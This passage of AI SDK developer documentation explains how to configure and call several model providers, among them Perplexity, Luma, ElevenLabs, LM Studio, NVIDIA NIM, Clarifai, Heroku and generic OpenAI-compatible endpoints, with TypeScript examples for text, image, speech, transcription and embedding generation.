import { experimental_generateImage as generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';
const { image } = await generateImage({
model: replicate.image('black-forest-labs/flux-schnell'),
prompt: 'The Loch Ness Monster getting a manicure',
aspectRatio: '16:9',
});
await writeFile('image.webp', image.uint8Array);
console.log('Image saved as image.webp');
Model-specific options
import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image('recraft-ai/recraft-v3'),
prompt: 'The Loch Ness Monster getting a manicure',
size: '1365x1024',
providerOptions: {
replicate: {
style: 'realistic_image',
},
},
});
Versioned Models
import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image(
'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
),
prompt: 'The Loch Ness Monster getting a manicure',
});
For more details, see the Replicate models page.
title: Perplexity
description: Learn how to use Perplexity's Sonar API with the AI SDK.
Perplexity Provider
The Perplexity provider offers access to Sonar API - a language model that uniquely combines real-time web search with natural language processing. Each response is grounded in current web data and includes detailed citations, making it ideal for research, fact-checking, and obtaining up-to-date information.
API keys can be obtained from the Perplexity Platform.
Setup
The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:
pnpm add @ai-sdk/perplexity
Provider Instance
You can import the default provider instance perplexity from @ai-sdk/perplexity:
import { perplexity } from '@ai-sdk/perplexity';
For custom configuration, you can import createPerplexity and create a provider instance with your settings:
import { createPerplexity } from '@ai-sdk/perplexity';
const perplexity = createPerplexity({
apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});
You can use the following optional settings to customize the Perplexity provider instance:
- baseURL (string): Use a different URL prefix for API calls. The default prefix is https://api.perplexity.ai.
- apiKey (string): API key that is sent using the Authorization header. It defaults to the PERPLEXITY_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create Perplexity models using a provider instance:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
Sources
Websites that have been used to generate the response are included in the sources property of the result:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
console.log(sources);
Provider Options & Metadata
The Perplexity provider includes additional metadata in the response through providerMetadata.
Additional configuration options are available through providerOptions.
const result = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
providerOptions: {
perplexity: {
return_images: true, // Enable image responses (Tier-2 Perplexity users only)
},
},
});
console.log(result.providerMetadata);
// Example output:
// {
// perplexity: {
// usage: { citationTokens: 5286, numSearchQueries: 1 },
// images: [
// { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
// { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
// ]
// },
// }
The metadata includes:
- usage: object containing citationTokens and numSearchQueries metrics
- images: array of image URLs when return_images is enabled (Tier-2 users only)
You can enable image responses by setting return_images: true in the provider options. This feature is only available to Perplexity Tier-2 users and above.
PDF Support
The Perplexity provider supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: perplexity('sonar-pro'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is this document about?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
You can also pass the URL of a PDF:
{
type: 'file',
data: new URL('https://example.com/document.pdf'),
mediaType: 'application/pdf',
filename: 'document.pdf', // optional
}
The model will have access to the contents of the PDF file and respond to questions about it.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| sonar-deep-research | | | | |
| sonar-reasoning-pro | | | | |
| sonar-reasoning | | | | |
| sonar-pro | | | | |
| sonar | | | | |
title: Luma
description: Learn how to use Luma AI models with the AI SDK.
Luma Provider
Luma AI provides state-of-the-art image generation models through their Dream Machine platform. Their models offer ultra-high quality image generation with superior prompt understanding and unique capabilities like character consistency and multi-image reference support.
Setup
The Luma provider is available via the @ai-sdk/luma module. You can install it with:
pnpm add @ai-sdk/luma
Provider Instance
You can import the default provider instance luma from @ai-sdk/luma:
import { luma } from '@ai-sdk/luma';
If you need a customized setup, you can import createLuma and create a provider instance with your settings:
import { createLuma } from '@ai-sdk/luma';
const luma = createLuma({
apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Luma provider instance:
- baseURL (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.lumalabs.ai.
- apiKey (string): API key that is sent using the Authorization header. It defaults to the LUMA_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Luma image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { luma } from '@ai-sdk/luma';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';
const { image } = await generateImage({
model: luma.image('photon-1'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Image Model Settings
You can customize the generation behavior with optional settings:
const { image } = await generateImage({
model: luma.image('photon-1'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
maxImagesPerCall: 1, // Maximum number of images to generate per API call
providerOptions: {
luma: {
pollIntervalMillis: 5000, // How often to check for completed images (in ms)
maxPollAttempts: 10, // Maximum number of polling attempts before timeout
},
},
});
Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:
- maxImagesPerCall (number): Override the maximum number of images generated per API call. Defaults to 1.
- pollIntervalMillis (number): Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
- maxPollAttempts (number): Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.
Model Capabilities
Luma offers two main models:
| Model | Description |
|---|---|
| photon-1 | High-quality image generation with superior prompt understanding |
| photon-flash-1 | Faster generation optimized for speed while maintaining quality |
Both models support the following aspect ratios:
- 1:1
- 3:4
- 4:3
- 9:16
- 16:9 (default)
- 9:21
- 21:9
For more details about supported aspect ratios, see the Luma Image Generation documentation.
Key features of Luma models include:
- Ultra-high quality image generation
- 10x higher cost efficiency compared to similar models
- Superior prompt understanding and adherence
- Unique character consistency capabilities from single reference images
- Multi-image reference support for precise style matching
Advanced Options
Luma models support several advanced features through the providerOptions.luma parameter.
Image Reference
Use up to 4 reference images to guide your generation. Useful for creating variations or visualizing complex concepts. Adjust the weight (0-1) to control the influence of reference images.
// Example: Generate a salamander with reference
await generateImage({
model: luma.image('photon-1'),
prompt: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
providerOptions: {
luma: {
image_ref: [
{
url: 'https://example.com/reference.jpg',
weight: 0.85,
},
],
},
},
});
Style Reference
Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.
// Example: Generate with style reference
await generateImage({
model: luma.image('photon-1'),
prompt: 'A blue cream Persian cat launching its website on Vercel',
providerOptions: {
luma: {
style_ref: [
{
url: 'https://example.com/style.jpg',
weight: 0.8,
},
],
},
},
});
Character Reference
Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.
// Example: Generate character-based image
await generateImage({
model: luma.image('photon-1'),
prompt: 'A woman with a cat riding a broomstick in a forest',
providerOptions: {
luma: {
character_ref: {
identity0: {
images: ['https://example.com/character.jpg'],
},
},
},
},
});
Modify Image
Transform existing images using text prompts. Use the weight parameter to control how closely the result matches the input image (higher weight = closer to input but less creative).
// Example: Modify existing image
await generateImage({
model: luma.image('photon-1'),
prompt: 'transform the bike to a boat',
providerOptions: {
luma: {
modify_image_ref: {
url: 'https://example.com/image.jpg',
weight: 1.0,
},
},
},
});
For more details about Luma's capabilities and features, visit the Luma Image Generation documentation.
title: ElevenLabs
description: Learn how to use the ElevenLabs provider for the AI SDK.
ElevenLabs Provider
The ElevenLabs provider contains language model support for the ElevenLabs transcription and speech generation APIs.
Setup
The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with:
pnpm add @ai-sdk/elevenlabs
Provider Instance
You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:
import { elevenlabs } from '@ai-sdk/elevenlabs';
If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:
import { createElevenLabs } from '@ai-sdk/elevenlabs';
const elevenlabs = createElevenLabs({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the ElevenLabs provider instance:
- apiKey (string): API key that is sent using the Authorization header. It defaults to the ELEVENLABS_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the ElevenLabs speech API
using the .speech() factory method.
The first argument is the model id e.g. eleven_multilingual_v2.
const model = elevenlabs.speech('eleven_multilingual_v2');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
const result = await generateSpeech({
model: elevenlabs.speech('eleven_multilingual_v2'),
text: 'Hello, world!',
providerOptions: { elevenlabs: {} },
});
- language_code (string or null): Optional. Language code (ISO 639-1) used to enforce a language for the model. Currently, only Turbo v2.5 and Flash v2.5 support language enforcement; for other models, providing a language code will result in an error.
- voice_settings (object or null): Optional. Voice settings that override stored settings for the given voice. These are applied only to the current request.
  - stability (double or null): Optional. Determines how stable the voice is and the randomness between each generation. Lower values introduce a broader emotional range; higher values result in a more monotonous voice.
  - similarity_boost (double or null): Optional. Controls how closely the AI should adhere to the original voice.
  - style (double or null): Optional. Amplifies the style of the original speaker. May increase latency if set above 0.
  - use_speaker_boost (boolean or null): Optional. Boosts similarity to the original speaker. Increases computational load and latency.
- pronunciation_dictionary_locators (array of objects or null): Optional. A list of pronunciation dictionary locators to apply to the text, in order. Up to 3 locators per request. Each locator object contains:
  - pronunciation_dictionary_id (string, required): The ID of the pronunciation dictionary.
  - version_id (string or null, optional): The version ID of the dictionary. If not provided, the latest version is used.
- seed (integer or null): Optional. If specified, the system will attempt to sample deterministically. Must be between 0 and 4294967295. Determinism is not guaranteed.
- previous_text (string or null): Optional. The text that came before the current request's text. Can improve continuity when concatenating generations or influence the continuity of the current generation.
- next_text (string or null): Optional. The text that comes after the current request's text. Can improve continuity when concatenating generations or influence the continuity of the current generation.
- previous_request_ids (array of strings or null): Optional. List of request IDs for samples generated before this one. Improves continuity when splitting large tasks. Max 3 IDs. If both previous_text and previous_request_ids are sent, previous_text is ignored.
- next_request_ids (array of strings or null): Optional. List of request IDs for samples generated after this one. Useful for maintaining continuity when regenerating a sample. Max 3 IDs. If both next_text and next_request_ids are sent, next_text is ignored.
- apply_text_normalization (enum): Optional. Controls text normalization. Allowed values: 'auto' (default), 'on', 'off'. 'auto' lets the system decide whether to apply normalization (e.g., spelling out numbers); 'on' always applies it; 'off' never applies it. For eleven_turbo_v2_5 and eleven_flash_v2_5, normalization can only be enabled with Enterprise plans.
- apply_language_text_normalization (boolean): Optional. Defaults to false. Controls language text normalization, which helps with proper pronunciation in some supported languages (currently only Japanese). May significantly increase latency.
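As a rough sketch, several of these options can be combined through providerOptions. The values below are illustrative assumptions, not recommendations:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
const result = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: 'Hello, world!',
  providerOptions: {
    elevenlabs: {
      // Illustrative values: lower stability widens the emotional range.
      voice_settings: { stability: 0.4, similarity_boost: 0.75 },
      // Best-effort deterministic sampling; determinism is not guaranteed.
      seed: 42,
      apply_text_normalization: 'auto',
    },
  },
});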
Model Capabilities
| Model | Instructions |
|---|---|
| eleven_v3 | |
| eleven_multilingual_v2 | |
| eleven_flash_v2_5 | |
| eleven_flash_v2 | |
| eleven_turbo_v2_5 | |
| eleven_turbo_v2 | |
| eleven_monolingual_v1 | |
| eleven_multilingual_v1 | |
Transcription Models
You can create models that call the ElevenLabs transcription API
using the .transcription() factory method.
The first argument is the model id e.g. scribe_v1.
const model = elevenlabs.transcription('scribe_v1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
const result = await transcribe({
model: elevenlabs.transcription('scribe_v1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: { elevenlabs: { languageCode: 'en' } },
});
The following provider options are available:
- languageCode (string): An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to null, in which case the language is predicted automatically.
- tagAudioEvents (boolean): Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to true.
- numSpeakers (integer): The maximum number of speakers talking in the uploaded file. Can help with predicting who speaks when. The maximum number of speakers that can be predicted is 32. Defaults to null, in which case the number of speakers is set to the maximum value the model supports.
- timestampsGranularity (enum): The granularity of the timestamps in the transcription. Defaults to 'word'. Allowed values: 'none', 'word', 'character'.
- diarize (boolean): Whether to annotate which speaker is currently talking in the uploaded file. Defaults to true.
- fileFormat (enum): The format of the input audio. Defaults to 'other'. Allowed values: 'pcm_s16le_16', 'other'. For 'pcm_s16le_16', the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency will be lower than with passing an encoded waveform.
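As a sketch, several of these options can be combined in a single call. The audio file path is a placeholder, and the option values are illustrative:
import { experimental_transcribe as transcribe } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
import { readFile } from 'node:fs/promises';
const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  // './meeting.mp3' is a placeholder path.
  audio: await readFile('./meeting.mp3'),
  providerOptions: {
    elevenlabs: {
      languageCode: 'en',
      diarize: true, // annotate which speaker is talking
      timestampsGranularity: 'word',
      tagAudioEvents: false, // skip tags like (laughter)
    },
  },
});
console.log(result.text);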
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| scribe_v1 | | | | |
| scribe_v1_experimental | | | | |
title: LM Studio
description: Use the LM Studio OpenAI compatible API with the AI SDK.
LM Studio Provider
LM Studio is a user interface for running local models.
It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).
Setup
The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
Language Models
You can interact with local LLMs in LM Studio using a provider instance.
The first argument is the model id, e.g. llama-3.2-1b.
const model = lmstudio('llama-3.2-1b');
To be able to use a model, you need to download it first.
Example
You can use LM Studio language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
const { text } = await generateText({
model: lmstudio('llama-3.2-1b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
maxRetries: 1, // immediately error if the server is not running
});
LM Studio language models can also be used with streamText.
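For example, here is a minimal streaming sketch against the local server, assuming the model has already been downloaded in LM Studio:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const lmstudio = createOpenAICompatible({
  name: 'lmstudio',
  baseURL: 'http://localhost:1234/v1',
});
const result = streamText({
  model: lmstudio('llama-3.2-1b'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
// Print each text chunk as it arrives.
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}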
Embedding Models
You can create models that call the LM Studio embeddings API
using the .textEmbeddingModel() factory method.
const model = lmstudio.textEmbeddingModel(
'text-embedding-nomic-embed-text-v1.5',
);
Example - Embedding a Single Value
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
value: 'sunny day at the beach',
});
Example - Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embeddings models,
e.g. lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5') or lmstudio.textEmbeddingModel('text-embedding-bge-small-en-v1.5').
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embedMany } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
title: NVIDIA NIM
description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.
NVIDIA NIM Provider
NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.
Setup
The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
Language Models
You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:
const model = nim.chatModel('deepseek-ai/deepseek-r1');
Example - Generate Text
You can use NIM language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const { text, usage, finishReason } = await generateText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});
console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
Example - Stream Text
NIM language models can also generate text in a streaming fashion with the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const result = streamText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the Northern White Rhino.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);
NIM language models can also be used with other AI SDK functions like generateObject and streamObject.
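As a sketch of what that can look like with generateObject, note that the Zod schema below is an illustrative assumption, not part of the NIM docs:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateObject } from 'ai';
import { z } from 'zod';
const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});
const { object } = await generateObject({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  // Illustrative schema for a structured recipe.
  schema: z.object({
    name: z.string(),
    ingredients: z.array(z.string()),
    steps: z.array(z.string()),
  }),
  prompt: 'Generate a simple pasta recipe.',
});
console.log(object);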
title: Clarifai
description: Use Clarifai OpenAI compatible API with the AI SDK.
Clarifai Provider
Clarifai is a platform for building, deploying, and scaling AI-powered applications. It provides a suite of tools and APIs for computer vision, natural language processing, and generative AI. Clarifai offers an OpenAI-compatible API through its full-stack AI development platform, making it easy to integrate powerful AI capabilities using the AI SDK.
Setup
The Clarifai provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use Clarifai, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
New users can sign up for a free account on Clarifai to get started.
Language Models
You can interact with various large language models (LLMs) available on Clarifai using the provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
Example - Generate Text
You can use Clarifai language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
const { text, usage, finishReason } = await generateText({
model,
prompt: 'What is photosynthesis?',
});
console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
Example - Streaming Text
You can also stream text responses from Clarifai models using the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
const result = streamText({
model,
prompt: 'What is photosynthesis?',
});
for await (const message of result.textStream) {
console.log(message);
}
For a full list of available models, refer to the Clarifai Model Gallery.
title: Heroku
description: Use a Heroku OpenAI compatible API with the AI SDK.
Heroku Provider
Heroku is a cloud platform that allows you to deploy and run applications, including AI models with OpenAI API compatibility. You can deploy models that are OpenAI API compatible and use them with the AI SDK.
Setup
The Heroku provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with:
pnpm add @ai-sdk/openai-compatible
Heroku Setup
- Create a test app in Heroku:
heroku create
- Provision the claude-3-5-haiku model for inference:
heroku ai:models:create -a $APP_NAME claude-3-5-haiku
- Export the configuration variables:
export INFERENCE_KEY=$(heroku config:get INFERENCE_KEY -a $APP_NAME)
export INFERENCE_MODEL_ID=$(heroku config:get INFERENCE_MODEL_ID -a $APP_NAME)
export INFERENCE_URL=$(heroku config:get INFERENCE_URL -a $APP_NAME)
Provider Instance
To use Heroku, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
Be sure to have your INFERENCE_KEY, INFERENCE_MODEL_ID, and INFERENCE_URL set in your environment variables.
Language Models
You can create Heroku models using a provider instance.
The first argument is the served model name, e.g. claude-3-5-haiku.
const model = heroku('claude-3-5-haiku');
Example
You can use Heroku language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
const { text } = await generateText({
model: heroku('claude-3-5-haiku'),
prompt: 'Tell me about yourself in one sentence',
});
console.log(text);
Heroku language models are also able to generate text in a streaming fashion with the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
const result = streamText({
model: heroku('claude-3-5-haiku'),
prompt: 'Tell me about yourself in one sentence',
});
for await (const message of result.textStream) {
console.log(message);
}
Heroku language models can also be used with the generateObject and streamObject functions.
title: OpenAI Compatible Providers
description: Use OpenAI compatible providers with the AI SDK.
OpenAI Compatible Providers
You can use the OpenAI Compatible Provider package to work with language model providers that implement the OpenAI API.
Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.
We provide detailed documentation for several OpenAI compatible providers, including LM Studio, NVIDIA NIM, Clarifai, and Heroku; the general setup and provider instance creation are the same for all of them.
Setup
The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
includeUsage: true, // Include usage information in streaming responses
});
You can use the following optional settings to customize the provider instance:
- baseURL (string): Set the URL prefix for API calls.
- apiKey (string): API key for authenticating requests. If specified, adds an Authorization header to request headers with the value Bearer <apiKey>. This will be added before any headers potentially specified in the headers option.
- headers (Record<string,string>): Optional custom headers to include in requests. These will be added to request headers after any headers potentially added by use of the apiKey option.
- queryParams (Record<string,string>): Optional custom URL query parameters to include in request URLs.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- includeUsage (boolean): Include usage information in streaming responses. When enabled, usage data will be included in the response metadata for streaming requests. Defaults to undefined (false).
- supportsStructuredOutputs (boolean): Set to true if the provider supports structured outputs. Only relevant for provider(), provider.chatModel(), and provider.languageModel().
Language Models
You can create provider models using a provider instance.
The first argument is the model id, e.g. model-id.
const model = provider('model-id');
Example
You can use provider language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Including model ids for auto-completion
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
type ExampleChatModelIds =
| 'meta-llama/Llama-3-70b-chat-hf'
| 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
| (string & {});
type ExampleCompletionModelIds =
| 'codellama/CodeLlama-34b-Instruct-hf'
| 'Qwen/Qwen2.5-Coder-32B-Instruct'
| (string & {});
type ExampleEmbeddingModelIds =
| 'BAAI/bge-large-en-v1.5'
| 'bert-base-uncased'
| (string & {});
const model = createOpenAICompatible<
ExampleChatModelIds,
ExampleCompletionModelIds,
ExampleEmbeddingModelIds
>({
name: 'example',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.example.com/v1',
});
// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.
const { text } = await generateText({
model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Custom query parameters
Some providers may require custom query parameters. An example is the Azure AI
Model Inference
API
which requires an api-version query parameter.
You can set these via the optional queryParams provider setting. These will be
added to all requests made by the provider.
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
queryParams: {
'api-version': '1.0.0',
},
});
For example, with the above configuration, API requests would include the query parameter in the URL like:
https://api.provider.com/v1/chat/completions?api-version=1.0.0.
Provider-specific options
The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.
For example, if you create a provider instance with the name provider-name, you can add a custom-option field to the request body like this:
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
providerOptions: {
'provider-name': { customOption: 'magic-value' },
},
});
The request body sent to the provider will include the customOption field with the value magic-value. This gives you an easy way to add provider-specific options to requests without having to modify the provider or AI SDK code.
Custom Metadata Extraction
